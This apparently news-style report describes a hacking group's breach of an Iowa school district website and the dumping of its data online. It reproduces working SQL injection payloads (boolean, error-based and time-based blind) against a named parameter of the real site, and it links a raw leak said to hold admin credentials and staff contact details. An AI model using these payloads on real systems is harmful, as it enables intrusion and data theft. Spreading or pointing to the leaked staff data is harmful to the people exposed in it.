Last night “Shizen“ and “Ftp“ of New World Hackers announced a hack of East Sac Community School District in Lake View, Iowa, allowing the group to gain remote access to several site databases before compiling and ultimately dumping the information online. In a press release made available to the public through Ghostbin, Shizen explains how they were able to hack the website through various SQL Injections, granting them access to PHP 5.6.23 files hosted in a MySQL database on the Nginx web server of a WordPress website.
Parameter: id (GET)
Target: boolean-based blind
Title: AND boolean-based blind – WHERE or HAVING clause
Payload: id=7 AND 1973=1973
Title: MySQL >= 5.0 AND error-based – WHERE, HAVING, ORDER BY, or GROUP BY clause (FLOOR)
Payload: id=7 AND (SELECT 4390 FROM SELECT COUNT(*), CONCAT(0x7170716271, (SELECT (ELT(4390=4390,1))),0x716a767671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.P LUGINS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND te-based blind
Payload: id=7 AND SLEEP(5)
Exposed within the leak are the exact vulnerabilities effecting the site, the payloads delivered to compromise it, as well as the root admin username and password. You can also find the contact information of various school employees/administrators, including full names, positions, email addresses and phone numbers, as well as the login user names, emails and hashed passwords of various site administrators.
Website Hit: hxxp://eastsac.k12.ia.us/
Raw Leak: https://ghostbin.com/paste/hwpf2